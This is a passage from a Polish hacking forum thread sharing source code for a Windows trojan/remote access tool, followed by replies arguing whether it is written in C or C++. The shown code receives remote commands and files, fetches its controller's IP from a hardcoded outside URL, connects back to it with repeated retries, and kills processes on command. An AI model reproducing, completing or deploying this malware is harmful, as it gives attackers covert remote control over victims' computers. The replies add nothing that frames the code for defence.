     recv(client, DFile, sizeof(DFile), 0);
     
     if(!strcmp(Data, "Error"))
     {
     }
     
     else
     {
     fileSEND(Data, DFile);
     }
     }
     
     if(!strcmp(Command, "stop"))
     {
     WSACleanup();
     closesocket(server), (client);
     exit(0);
     }
     }
     }

void ConnectToClient()
{
      TryAgain:
      
      closesocket(client), (server);
               
      Sleep(5000);
      
      HINTERNET hInet = InternetOpen("GetIp", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);
     
      if(hInet == NULL)
      {
      InternetCloseHandle(hInet);
      goto TryAgain;
      }
      /* Edit the url, u need to give the url of ur ip !!! */
      
      HINTERNET hFile = InternetOpenUrl(hInet, "http://hackerswelcome.ha.funpic.de/ip.txt", NULL, 0, 0, 0);
      
      InternetReadFile(hFile, IP, 20, &size);
      
      InternetCloseHandle(hInet), (hFile);
      
      if(WSAStartup(MAKEWORD(2, 2), &wsadata) != 0)
      {
      WSACleanup();
      goto TryAgain;
      }
      
      client = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
      
      if(client == INVALID_SOCKET)
      {
      WSACleanup();
      closesocket(client);
      goto TryAgain;
      }
      
      sockaddr_in clnt;
      
      clnt.sin_port=htons(80);
      clnt.sin_addr.s_addr=inet_addr(IP);
      clnt.sin_family=AF_INET;
                   
      if(connect(client,(sockaddr*)&clnt, sizeof(clnt)) == SOCKET_ERROR)
      {
      WSACleanup();
      closesocket(client), (server);
      goto TryAgain;
      }
      
      else
      {
      RecvCommands();
      }
}  

int WINAPI WinMain (HINSTANCE hThisInstance, HINSTANCE hPrevInstance, LPSTR lpszArgument, int nFunsterStil)
{
     StartUp();
     ConnectToClient();
}

BOOL KillProcessByName(char *szProcessToKill)
{
     HANDLE hProcessSnap;
     HANDLE hProcess;
     PROCESSENTRY32 pe32;
     DWORD dwPriorityClass;
     
     hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
     
     if(hProcessSnap == INVALID_HANDLE_VALUE)
     {
     return(FALSE);
     }
     
     pe32.dwSize = sizeof(PROCESSENTRY32);
     
     if(!Process32First(hProcessSnap, &pe32))
     {
     CloseHandle(hProcessSnap);     
     return(FALSE);
     }
     
     do{

     if(!strcmp(pe32.szExeFile, szProcessToKill))
     {
     hProcess = OpenProcess(PROCESS_TERMINATE,0, pe32.th32ProcessID);
     
     if(TerminateProcess(hProcess,0) == ERROR)
     {
     strcpy(Data, "Error");
     send(client, Data, sizeof(Data), 0);
     }
     
     else
     {
     strcpy(Data, "Succesfully");
     send(client, Data, sizeof(Data), 0);
     }  
     }     
     }
     
     while(Process32Next(hProcessSnap, &pe32));
     CloseHandle(hProcessSnap), (hProcess);
}
    
Kenjin
Ekipa HEP
Posty: 122
Rejestracja: 04 sty 2016, 22:10

Re: [C++] Trojan/RAT w architekturze klient-serwer

Post autor: Kenjin »

To jest chyba samo C a nie C++ :P
Awatar użytkownika
F3nix
Posty: 332
Rejestracja: 28 kwie 2015, 20:51

Re: [C++] Trojan/RAT w architekturze klient-serwer

Post autor: F3nix »

Chyba jednak C++ bo tego nie jestem pewny ale w C trzeba chyba używać zawsze rozszerzenia .h w nawet standardowych plikach nagłówkowych + przestrzeń nazw using namespace std; na to by wskazywała.
Kenjin
Ekipa HEP
Posty: 122
Rejestracja: 04 sty 2016, 22:10

Re: [C++] Trojan/RAT w architekturze klient-serwer

Post autor: Kenjin »

Faktycznie nie zauwazylem ze uzywa namespace'a. Ale poza ta deklaracja i bibliotekami nie widze tam nic z obiektowego C++.

Moze inaczej to jest C++ ale tylko po to aby mogl uzywac bibliotek bo semantyka jest czyste C. Zwroc uwage, ze do printowania uzywa funkcji printf a nie metody cout (ktorej uzywa chyba kazdy w c++).
ODPOWIEDZ